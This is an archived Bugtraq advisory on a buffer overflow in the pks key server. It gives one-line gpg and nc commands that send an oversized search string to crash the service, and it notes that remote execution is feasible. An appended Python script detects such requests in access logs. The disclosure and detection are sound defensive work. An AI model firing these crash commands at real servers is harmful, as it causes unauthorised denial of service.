[25563] in bugtraq


pks public key server DOS and remote execution

daemon@ATHENA.MIT.EDU (Max)
Fri May 24 20:35:08 2002

Date: Fri, 24 May 2002 15:39:06 -0700 (PDT)
From: Max <rusmir@tula.net>
To: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.44.0205241508290.12835-100000@sds.disney.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi there,

A popular pks public key server, available from
http://www.mit.edu/people/marc/pks/pks.html,
is vulnerable to a buffer overflow attack.

A long enough (> 256b) search request will crash the service.

It is as simple as this:

gpg --search-keys `perl -e "print 'A'x512"`

or, without gpg,

echo -e "GET /pks/lookup?op=index&search=`perl -e "print 'A'x512"`"| nc keyserver-host 11371

Fortunately (or unfortunately), in order to exploit remote execution, the
code should be an isalnum() string and should be able to survive tolower()
conversion. But it is possible to write one, especially for systems with
locales, where 0x80..0xff are printable characters.

Thanks,
Max.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE87sEN8mCpXsrcXpwRAiBoAJ9UjT7+XPoBJ0COO/W5gIHHFYmOygCgm80Y
oIAccr98kivYr2KsuF4SFzg=
=9quB
-----END PGP SIGNATURE-----
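The advisory gives the trigger (a /pks/lookup request whose search parameter exceeds 256 bytes) and notes that bytes in 0x80..0xff matter on systems with locales. The following is an added detection example, not code from pks or from the advisory's author: it parses HKP lookup lines from an Apache-style access log (the log format is an assumption; the path and parameter names come from the advisory's own request line), measures the percent-decoded search value, and reports requests that cross the 256-byte limit together with whether they carry high bytes. The sample log lines are constructed, not real traffic.

```python
"""Flag HKP lookup requests whose search parameter exceeds the length pks tolerates.

Added example for this advisory, not code from pks or its author. The log format
(Apache-style request line in double quotes) is an assumption.
"""
from __future__ import annotations

import re
from urllib.parse import unquote_to_bytes

SEARCH_LIMIT = 256  # the advisory states that search requests longer than 256 bytes crash pks

# Extracts the request target from an Apache-style access log line (assumed format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def hkp_search_bytes(target: str) -> bytes | None:
    """Return the percent-decoded 'search' value of a /pks/lookup request, else None.

    Decoding is done by hand rather than with parse_qs so the length reflects the raw
    bytes the server would copy, including 0x80..0xff, which the advisory singles out.
    """
    path, _, query = target.partition("?")
    if path != "/pks/lookup":
        return None
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == "search":
            return unquote_to_bytes(value.replace("+", " "))
    return None


def assess_target(target: str) -> dict:
    """Classify one request target; 'oversized' means the search value crosses SEARCH_LIMIT."""
    search = hkp_search_bytes(target)
    if search is None:
        return {"hkp": False}
    return {
        "hkp": True,
        "length": len(search),
        "oversized": len(search) > SEARCH_LIMIT,
        # Bytes outside 7-bit ASCII, flagged because of the advisory's remark on locales.
        "high_bytes": any(b >= 0x80 for b in search),
    }


def scan_access_log(text: str) -> list[tuple[str, int, bool]]:
    """Return (client, search length, high_bytes) for every oversized HKP lookup in the log."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        info = assess_target(m.group("target"))
        if info.get("oversized"):
            client = line.split(" ", 1)[0]
            findings.append((client, info["length"], info["high_bytes"]))
    return findings


# Constructed sample log lines (not real traffic). The third mirrors the advisory's
# 512-byte probe; the fourth carries percent-encoded high bytes.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [24/May/2002:15:39:06 -0700] "GET /pks/lookup?op=index&search=max%40tula.net HTTP/1.0" 200 1204',
    '10.0.0.9 - - [24/May/2002:15:40:11 -0700] "GET /pks/add HTTP/1.0" 200 88',
    '10.0.0.7 - - [24/May/2002:15:41:30 -0700] "GET /pks/lookup?op=index&search=' + "A" * 512 + ' HTTP/1.0" 500 0',
    '10.0.0.8 - - [24/May/2002:15:42:02 -0700] "GET /pks/lookup?op=index&search=' + "%C4" * 300 + ' HTTP/1.0" 500 0',
])

if __name__ == "__main__":
    for client, length, high in scan_access_log(SAMPLE_LOG):
        print(f"{client}: search parameter {length} bytes (high bytes: {high})")
```

Measuring after percent-decoding is the part that matters: an encoded request line can look short in the log while the decoded value the server handles is well past the limit, and the high-byte flag separates plain length probes from requests shaped for the locale case the advisory mentions.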
